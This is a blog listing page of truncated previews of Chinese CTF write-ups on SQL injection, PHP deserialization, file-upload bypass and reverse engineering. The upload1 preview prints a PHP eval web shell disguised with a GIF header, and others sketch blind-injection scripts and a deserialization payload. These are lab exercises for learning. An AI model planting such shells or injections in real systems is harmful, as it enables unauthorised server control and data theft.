- 博客(77)
- 收藏
- 关注
原创 CentOS8部署(Vue + Django)前后端分离项目详细版
CentOS 8 部署(Vue + Django)前后端分离项目。(解决Vue打包后跨域失效问题)
2022-05-15 18:22:56 2780 1
原创 BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
启动挑战页面访问一下robots.txt看看有没有什么提示发现有个可疑的链接:/fAke_f1agggg.php到这里就可以看到重要的源码了<img src="/img.jpg"><?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num .
2021-10-07 20:24:49 787
原创 BUUCTF之[SUCTF 2019]CheckIn ---------------------- .user.ini制作后门
BUUCTF之[SUCTF 2019]CheckIn ---------------------- .user.ini制作后门这道题我做过很多遍了,但是好几次都是做不出来。只能一边又一边的跑去看别人的WP。但是随着次数多了,慢慢的就会做了。从一开始不理解到理解,现在我一看到这个题目就能想起接下来的做题步骤了…还真是应了那两句成语:勤能补拙,熟能生巧。题目知识点一句话木马.user.ini 文件包含制作后门.user.ini...
2021-10-06 11:38:58 317
原创 BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象)这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过先说一下网上找来的别的大佬的Payload# -*- coding:utf-8 -*-import requestsimport stringdef blind_injection(url).
2021-10-05 23:30:26 404 1
原创 BUUCTF之[GXYCTF2019]BabySQli
题目这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。启动BurpSuite抓包看看有两个可疑点:一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。这里返回的绿色部分明显是加密后的数据首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64原数据:MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
2021-10-03 22:33:13 2495
原创 火狐浏览器快速代理插件(FoxyProxy Standard)
经常打CTF的人都知道,要想使用BurpSuite就需要给浏览器开启127.0.0.1:8080代理服务。而火狐浏览器里就带有快速代理的插件(FoxyProxy)。有了这个插件就可以快速的启动代理服务了这是成功的情形首先启动火狐浏览器,然后点击进入扩展与主题然后在搜索框上输入FoxyProxy搜索结果返回的第一个就是我们要添加的代理插件点击添加代理插件插件安装成功的标志然后单击刚才的那个插件标志输入代理的IP地址:127.0.0.1和端口号:8080
2021-10-03 17:35:04 21056
原创 i春秋之爆破-2 -------- 文件读取
题目知识点:PHP文件读取函数利用Linux读取文件的函数(一)PHP中文件读取的几个函数:freadfgetsfgetssfilereadfilefile_get_contentsshow_source参考来源:https://www.jb51.net/article/53266.htm(二)利用Linux读取文件的函数systemexecshell_execpassthrupopen参考来源: https://bbs.ichunqiu.com/foru
2021-09-19 17:06:32 1017
原创 BUUCTF 逆向工程(reverse)之[WUSTCTF2020]level2
用IDA打开,发现是加了壳的所以用kali自带的upx脱壳一开始搜索flag和main这些都找不到相关的信息。还以为是要从某个很难的函数里进行解密,结果只是脱壳就能拿到flag了。吓得我…最终答案为:flag{Just_upx_-d}...
2021-08-25 18:44:42 461
原创 BUUCTF 逆向工程(reverse)之[MRCTF2020]Transform
用IDA打开,进入到主函数// local variable allocation has failed, the output may be wrong!int __cdecl main(int argc, const char **argv, const char **envp){ __int64 v3; // rdx __int64 v4; // rdx char v6[104]; // [rsp+20h] [rbp-70h] int j; // [rsp+88h] [rbp-8
2021-08-25 18:30:04 939 3
原创 BUUCTF 逆向工程(reverse)之[WUSTCTF2020]level1
下载好题目后,可以看到level1和output.txt这两个文件。其中output.txt里面的数字就是我们要逆向的地方。用IDA打开,进入到主函数int __cdecl main(int argc, const char **argv, const char **envp){ FILE *stream; // ST08_8 signed int i; // [rsp+4h] [rbp-2Ch] char ptr[24]; // [rsp+10h] [rbp-20h] unsigne
2021-08-25 17:04:27 741
原创 BUUCTF 逆向工程(reverse)之[SUCTF2019]SignIn
用IDA打开其中的大整数分解,可以利用这个网站帮助分解:http://www.factordb.com/__int64 __fastcall main(__int64 a1, char **a2, char **a3){ char v4; // [rsp+0h] [rbp-4A0h] char v5; // [rsp+10h] [rbp-490h] char v6; // [rsp+20h] [rbp-480h] char v7; // [rsp+30h] [rbp-470h]
2021-08-25 11:12:27 592
原创 BUUCTF 逆向工程(reverse)之[GUET-CTF2019]re
用IDA打开,发现是有加壳的。所以需要先去壳(这里我用的是kali自带的upx脱壳)因为找不到入口,所以先去找flag的关键词最终找到关键函数sub_400E28__int64 sub_400E28(){ const char *v0; // rdi __int64 result; // rax __int64 v2; // rdx unsigned __int64 v3; // rt1 __int64 v4; // [rsp+0h] [rbp-30h] __int64
2021-08-25 00:13:46 1306
原创 BUUCTF 逆向工程(reverse)之[GWCTF 2019]pyre
下载好题目后,发现后缀名为:.pyc所以使用python这些反编译工具:https://tool.lu/pyc/利用这个网站反编译一下就可以得到Python的源代码#!/usr/bin/env python# visit https://tool.lu/pyc/ for more informationprint 'Welcome to Re World!'print 'Your input1 is your flag~'l = len(input1)for i in range(l):
2021-08-23 19:28:45 932
原创 BUUCTF 逆向工程(reverse)之[BJDCTF2020]JustRE
用IDA打开,然后搜索包含main的函数找了一段时间,不知道从哪里下手。所以继续去搜索一下flag字符串然后再搜索一下花括号{}去找一下,它是怎么被使用的所以可以看出来关键函数是:DialogFuncBOOL __stdcall DialogFunc(HWND hWnd, UINT a2, WPARAM a3, LPARAM a4){ CHAR String; // [esp+0h] [ebp-64h] if ( a2 != 272 ) { if ( a2 != 2
2021-08-23 18:34:51 536
原创 BUUCTF 逆向工程(reverse)之findit
不知不觉,小明长大了,变成了一个程序员,虽然很苦逼,但是偶尔编写个小东西坑害公司新人还是蛮好玩的。新人小萌一天问小明wifi账号密码,一分钟后,小萌收到了一个文件。小萌想了好久都没得到密码,怎么办,女朋友要买东西,流量告罄,没wifi上不了网,不买就分手,是时候该展现月老的实力了兄弟们!代表月亮惩罚小明!得出答案。 注意:得到的 flag 请包上 flag{} 提交用APK-IDE打开,然后进入到smali -> com -> findit -> MainActivity.smali
2021-08-23 13:49:32 1587
原创 BUUCTF 逆向工程(reverse)之[GXYCTF2019]luck_guy
用IDA64打开,进入到get_flag函数unsigned __int64 get_flag(){ unsigned int v0; // eax char v1; // al signed int i; // [rsp+4h] [rbp-3Ch] signed int j; // [rsp+8h] [rbp-38h] __int64 s; // [rsp+10h] [rbp-30h] char v6; // [rsp+18h] [rbp-28h] unsigned __i
2021-08-23 13:11:11 799 1
原创 BUUCTF 逆向工程(reverse)之Java逆向解密
程序员小张不小心弄丢了加密文件用的秘钥,已知还好小张曾经编写了一个秘钥验证算法,聪明的你能帮小张找到秘钥吗? 注意:得到的 flag 请包上 flag{} 提交下载好题目后,发现它是个以.class为后缀的。所以用JD-GUI打开这个文件。就可以看到Java代码import java.util.ArrayList;import java.util.Scanner;public class Reverse { public static void main(String[] args) {
2021-08-23 12:13:18 2022
原创 BUUCTF 逆向工程(reverse)之SimpleRev
用IDA打开,进入到Decry函数unsigned __int64 Decry(){ char v1; // [rsp+Fh] [rbp-51h] int v2; // [rsp+10h] [rbp-50h] int v3; // [rsp+14h] [rbp-4Ch] int i; // [rsp+18h] [rbp-48h] int v5; // [rsp+1Ch] [rbp-44h] char src[8]; // [rsp+20h] [rbp-40h] __int64
2021-08-23 01:38:40 3246 6
原创 BUUCTF 逆向工程(reverse)之reverse3
用的IDA打开,然后进入的主函数_main_0__int64 __cdecl main_0(){ int v0; // eax const char *v1; // eax size_t v2; // eax int v3; // edx __int64 v4; // ST08_8 signed int j; // [esp+DCh] [ebp-ACh] signed int i; // [esp+E8h] [ebp-A0h] signed int v8; // [esp
2021-08-22 22:32:48 2112
原创 BUUCTF 逆向工程(reverse)之helloword
有难的题目,也就有简单的题目,就像程序员一辈子编写的第一个程序,极有可能是helloword,它很普通,但是也很让人怀念。你猜这题flag在哪里?让我们怀念第一次编写的easy程序吧! 注意:得到的 flag 请包上 flag{} 提交用APKIDE打开,然后在MainActivity.smali里就可以看到flag了...
2021-08-22 21:56:32 1002
原创 BUUCTF 逆向工程(reverse)之xor
题目:or的敌人,and 有个兄弟叫or,or有个敌人叫xor,那么你能帮助or战胜他的敌人xor吗,xor的奥秘就在附件中,开始战斗吧! 注意:得到的 flag 请包上 flag{} 提交用IDA打开,并进入到主函数中int __cdecl main(int argc, const char **argv, const char **envp){ char *v3; // rsi int result; // eax signed int i; // [rsp+2Ch] [rbp-12
2021-08-19 19:09:28 4335
原创 BUUCTF 逆向工程(reverse)之新年快乐
用IDA打开,发现就只有两个函数。所以猜测加了壳这里我用的是kali自带的upx进行脱壳再重新用IDA打开,进入到主函数int __cdecl main(int argc, const char **argv, const char **envp){ int result; // eax char Str2; // [esp+12h] [ebp-3Ah] char Str1[2]; // [esp+20h] [ebp-2Ch] char v6; // [esp+22h] [ebp
2021-08-19 18:30:34 763
原创 BUUCTF 逆向工程(reverse)之内涵的软件
用IDA32位打开一看到这个就是知道这里是获取flag的关键(因为花括号{})。一开始以为是用了某种加密方式需要转换一下。结果它显示的:{49d3c93df25caad81232130f3d2ebfad}这部分就是flag。所以这题的flag为:flag{49d3c93df25caad81232130f3d2ebfad}...
2021-08-19 18:14:40 407
原创 BUUCTF 逆向工程(reverse)之reverse2
用IDA64打开它,查看主函数int __cdecl main(int argc, const char **argv, const char **envp){ int result; // eax int stat_loc; // [rsp+4h] [rbp-3Ch] int i; // [rsp+8h] [rbp-38h] __pid_t pid; // [rsp+Ch] [rbp-34h] char s2; // [rsp+10h] [rbp-30h] unsigned _
2021-08-19 15:03:51 1179
原创 BUUCTF的逆向工程(reverse)之reverse1
用IDA64位打开,发现里面没有main函数,所以shift + F12查找一下flag关键词然后跟着提示找到关键函数sub_1400118C0__int64 sub_1400118C0(){ char *v0; // rdi signed __int64 i; // rcx size_t v2; // rax size_t v3; // rax char v5; // [rsp+0h] [rbp-20h] int j; // [rsp+24h] [rbp+4h] cha
2021-08-19 14:04:28 2049
原创 BUUCTF之[BSidesCF 2019]Futurella
BUUCTF之[BSidesCF 2019]Futurella右键查看源代码就可以看到flag了这题简单的让人无语…
2021-07-31 17:18:33 535
原创 BUUCTF之[b01lers2020]Welcome to Earth
BUUCTF之[b01lers2020]Welcome to Earth一开始查看源码和访问robots.txt都没有看到可用的信息,但是后来观察到浏览器上多访问了一个目录/die/,于是把它去看看能访问什么这时候在查看源代码,可以看到有可疑的链接/chase/用浏览器访问/chase/发现很快又跳转回来,所以用BurpSuite抓包访问完/door/的时候,突然就找不到突破口了。这里一直卡了很久。后来看别人的WP才知道要访问这里的/static/js/door.jsJav
2021-07-31 13:54:46 1264
原创 BUUCTF之[watevrCTF-2019]Cookie Store
BUUCTF之[watevrCTF-2019]Cookie Store打开挑战页面发现它说你初始基金是50,但是购买flag需要100然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看…一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西结果发现!!!所以payload:eyJtb25leSI6IDEwMCwgImhpc3Rvcnki
2021-07-30 15:52:10 391
原创 攻防世界之warmup
攻防世界之warmupsource.php源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page
2021-07-29 14:11:20 201
原创 BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计知识点反序列化中的对象逃逸extract()变量覆盖虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来…废话不多说,放代码 <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','
2021-07-28 21:34:48 1898
原创 BUUCTF之[GXYCTF2019]禁止套娃 ------GitHack源码泄露
BUUCTF之[GXYCTF2019]禁止套娃 ------GitHack源码泄露知识点GitHack源码泄露localeconv() 函数返回一包含本地数字及货币格式信息的数组。老实说,这道题我根本不会做。但是里面有好几处知识点我之前都没有接触过,所以先做下记录,,,...
2021-07-27 21:39:46 401
原创 GitHack源码泄露的下载和安装
GitHack源码泄露的下载和安装WindowsGitHack的下载地址:https://github.com/lijiejie/GitHack访问上面的链接,然后把GitHack项目下载下来,然后解压它。再通过命令行进入到项目的位置然后再运行命令:python2 GitHack.py https://xxxxxxxxxxxxx/.git/ 就可以下载下来了Linux这里的linux系统我直接用kali来做演示,因为kali有自带的Git、Python2和Python3。先在命令行上输入
2021-07-27 19:14:26 3203 2
原创 BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化
BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。首先是flag.php,这里面虽然有flag。但是这个flag是假的。<?php$flag = 'Syc{dog_dog_dog_dog}';?>然后就是index.php,你打开它后会发现它是WEB界面的那个代码。最后,想要拿到真正的flag。需要从cla
2021-07-27 11:23:02 445
原创 BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml
BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml题目经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词一般来说,SQL注入有这4个步骤:爆数据库:select database()爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas
2021-07-27 00:30:04 604
原创 物理机不能联网,但是虚拟机却可以正常上网
物理机不能联网,但是虚拟机却可以正常上网如果你是连WIFI的时候,发现物理机不能正常联网,但是虚拟机却可以。这可能是因为你之前不小心设置过网卡的原因。我之前就是因为在学校里搞那些云计算/云运维实验调整过WiFi的网卡。然后回到家后再次链接WiFi的时候。发现物理机不能正常上网了。这有可能是里面的IP地址冲突或者是DNS不能正常识别导致的问题。所以这里只要把IP地址和DNS服务器都改成自动获取就可以了具体操作:控制面板 --》 所有控制面板项 --》 网络连接 --》 右键你自己的网卡 --》 属性
2021-07-26 23:04:02 2920
原创 攻防世界之upload1 -----文件上传漏洞
攻防世界之upload1题目文件上传漏洞,所以上传一句话木马…GIF89a? <script language="php">eval($_POST['zyh']);</script>一开始是直接上传php文件,但是发现它会被拦下没关系,那就先改成文件后缀名,然后用BurpSuite抓包!然后再用BurpSuite改一下后缀名就可以了(改成php文件)最后再用蚁剑链接就可以得到Flag了...
2021-07-24 23:14:34 369 2
原创 攻防世界之unserialize3 ---------- 反序列化
攻防世界之unserialize3 ---------- 反序列化打开页面,果然。。。而且看起来挺简单的!class xctf{public $flag = '111';public function __wakeup(){exit('bad requests');}?code=所以开始构造payload:O:4:"xctf":1:{s:4:"flag";s:3:"111";}但是这里还有个小问题…如果直接用上面那个payload你会发现它被拦下。原因是__wakeup()这个函数p
2021-07-24 22:50:28 438 3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人